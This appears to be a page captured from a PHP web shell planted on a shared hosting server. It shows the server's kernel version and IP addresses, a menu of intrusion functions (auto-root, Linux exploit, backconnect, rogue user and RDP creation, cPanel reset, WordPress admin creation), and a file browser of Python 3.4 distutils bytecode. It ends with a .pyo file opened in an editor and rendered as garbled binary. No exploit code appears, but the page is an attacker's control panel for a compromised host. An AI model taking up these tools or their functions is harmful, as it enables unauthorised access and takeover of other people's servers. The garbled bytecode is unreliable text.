Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.15.228.0
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
python34 /
lib64 /
python3.4 /
distutils /
command /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-34.pyc
571
B
-rw-r--r--
__init__.cpython-34.pyo
571
B
-rw-r--r--
bdist.cpython-34.pyc
3.94
KB
-rw-r--r--
bdist.cpython-34.pyo
3.94
KB
-rw-r--r--
bdist_dumb.cpython-34.pyc
3.88
KB
-rw-r--r--
bdist_dumb.cpython-34.pyo
3.88
KB
-rw-r--r--
bdist_msi.cpython-34.pyc
21.33
KB
-rw-r--r--
bdist_msi.cpython-34.pyo
21.23
KB
-rw-r--r--
bdist_rpm.cpython-34.pyc
13.98
KB
-rw-r--r--
bdist_rpm.cpython-34.pyo
13.91
KB
-rw-r--r--
bdist_wininst.cpython-34.pyc
8.64
KB
-rw-r--r--
bdist_wininst.cpython-34.pyo
8.57
KB
-rw-r--r--
build.cpython-34.pyc
3.97
KB
-rw-r--r--
build.cpython-34.pyo
3.97
KB
-rw-r--r--
build_clib.cpython-34.pyc
5.32
KB
-rw-r--r--
build_clib.cpython-34.pyo
5.32
KB
-rw-r--r--
build_ext.cpython-34.pyc
16.73
KB
-rw-r--r--
build_ext.cpython-34.pyo
16.73
KB
-rw-r--r--
build_py.cpython-34.pyc
11.26
KB
-rw-r--r--
build_py.cpython-34.pyo
11.19
KB
-rw-r--r--
build_scripts.cpython-34.pyc
4.63
KB
-rw-r--r--
build_scripts.cpython-34.pyo
4.63
KB
-rw-r--r--
check.cpython-34.pyc
5.14
KB
-rw-r--r--
check.cpython-34.pyo
5.14
KB
-rw-r--r--
clean.cpython-34.pyc
2.32
KB
-rw-r--r--
clean.cpython-34.pyo
2.32
KB
-rw-r--r--
config.cpython-34.pyc
10.8
KB
-rw-r--r--
config.cpython-34.pyo
10.8
KB
-rw-r--r--
install.cpython-34.pyc
14.77
KB
-rw-r--r--
install.cpython-34.pyo
14.77
KB
-rw-r--r--
install_data.cpython-34.pyc
2.49
KB
-rw-r--r--
install_data.cpython-34.pyo
2.49
KB
-rw-r--r--
install_egg_info.cpython-34.py...
3.12
KB
-rw-r--r--
install_egg_info.cpython-34.py...
3.12
KB
-rw-r--r--
install_headers.cpython-34.pyc
1.81
KB
-rw-r--r--
install_headers.cpython-34.pyo
1.81
KB
-rw-r--r--
install_lib.cpython-34.pyc
5.56
KB
-rw-r--r--
install_lib.cpython-34.pyo
5.56
KB
-rw-r--r--
install_scripts.cpython-34.pyc
2.33
KB
-rw-r--r--
install_scripts.cpython-34.pyo
2.33
KB
-rw-r--r--
register.cpython-34.pyc
9.04
KB
-rw-r--r--
register.cpython-34.pyo
9.04
KB
-rw-r--r--
sdist.cpython-34.pyc
13.86
KB
-rw-r--r--
sdist.cpython-34.pyo
13.86
KB
-rw-r--r--
upload.cpython-34.pyc
5.67
KB
-rw-r--r--
upload.cpython-34.pyo
5.67
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install_data.cpython-34.pyo
� i f � @ sR d Z d d l Z d d l m Z d d l m Z m Z Gd d � d e � Z d S)z�distutils.command.install_data Implements the Distutils 'install_data' command, for installing platform-independent data files.� N)�Command)�change_root�convert_pathc @ sj e Z d Z d Z d d d g Z d g Z d d � Z d d � Z d d � Z d d � Z d d � Z d S)�install_datazinstall data files�install-dir=�d�Ibase directory for installing data files (default: installation base dir)�root=N�<install everything relative to this alternate root directory�force�f�-force installation (overwrite existing files)c C s@ d | _ g | _ d | _ d | _ | j j | _ d | _ d S)Nr � )�install_dir�outfiles�rootr Zdistribution� data_files�warn_dir)�self� r �C/opt/alt/python34/lib64/python3.4/distutils/command/install_data.py�initialize_options s zinstall_data.initialize_optionsc C s | j d d d d � d S) NZinstallr r r r )zinstall_datazinstall_dir)�rootr )�forcer )Zset_undefined_options)r r r r �finalize_options# s zinstall_data.finalize_optionsc C sk | j | j � xT| j D]I} t | t � r� t | � } | j ra | j d | | j f � n | j | | j � \ } } | j j | � q t | d � } t j j | � s� t j j | j | � } n | j r� t | j | � } n | j | � | d g k r| j j | � q xF | d D]: } t | � } | j | | � \ } } | j j | � q%Wq Wd S)NzMsetup script did not provide a directory for '%s' -- installing right in '%s'r r )Zmkpathr r � isinstance�strr r �warnZ copy_filer �append�os�path�isabs�joinr r )r r �out�_�dir�datar r r �run* s* zinstall_data.runc C s | j p g S)N)r )r r r r � get_inputsK s zinstall_data.get_inputsc C s | j S)N)r )r r r r �get_outputsN s zinstall_data.get_outputs)r r r )r Nr )zforcer r )�__name__� __module__�__qualname__ZdescriptionZuser_optionsZboolean_optionsr r r'